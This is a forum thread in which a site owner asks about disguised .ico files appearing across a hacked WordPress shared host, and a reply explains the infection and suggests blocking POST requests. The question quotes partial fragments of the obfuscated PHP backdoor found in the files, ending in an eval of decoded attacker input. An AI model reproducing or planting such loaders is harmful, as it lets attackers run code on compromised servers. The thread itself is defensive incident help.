Mobile app version of vmapp.org
Login or Join
Welton855

: Mysterious ico files appearing on webserver Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called

@Welton855

Posted in: #Apache #HackedSite #SharedHosting

Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called something like favicon_1166f9.ico. The first 6 characters are always favico and the extension is always ico. Although these are not icons and cannot be opened by an image viewer.

Five days ago I did a clean sweep and deleted hundreds of these files yet I just found two. I noticed some on the server before but thought it was just corruption from uploading a favicon but obviously this is not the case. The site actually as one favicon.ico in just the home dir and is working fine.

What could be causing these files to keep appearing? Is the site hacked?

UPDATE 1: Starting to really look like a hack. Here is the partial content being inserted:

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"x47x4cx4fBx41x4cx53"}['h21842aa7']="x59x2fx6cx45x75x44x7ax6fx68x2ax53x74x73x51x48x72x26x21x25x67x28x70x55x7cxax76x35x60x52x43x65x3dx4dx71x4fx32x31x7ex34x20x5ax41x2ex2cx3bx9x30x6ax57x6ex3f


And it goes on for 7K ending in:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}} ?>


Note that the last part is an eval of whatever the rest is.

UPDATE 2: This StackOverflow question shows someone with the same problem.

There is accepted answer but the proposed solution is to disable all POST requests which will not be possible here given this is a WordPress site and there are other parts using POST too (although not many but they are necessary).

Given this information it seems that this is an attack and not virus which is probably why a virus scan turned out nothing.

The question now is: How do I prevent this attack from working? If that is in fact what is going on.

10.01% popularity Vote Up Vote Down


Login to follow query

More posts by @Welton855

1 Comments

Sorted by latest first Latest Oldest Best

 

@Odierno851

This is an attack targeting a PHP vulnerability with POST requests.

The attacker somehow manages to change existing PHP files with an @include statement using an encoded path that translates into one to these .ico files which are self-decrypting PHP files calling an external script from another server.

Blocking POST requests works so far. Although that is only possible for sites that do not depend on external POST requests. This can be done in the .htaccess file as explained here.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme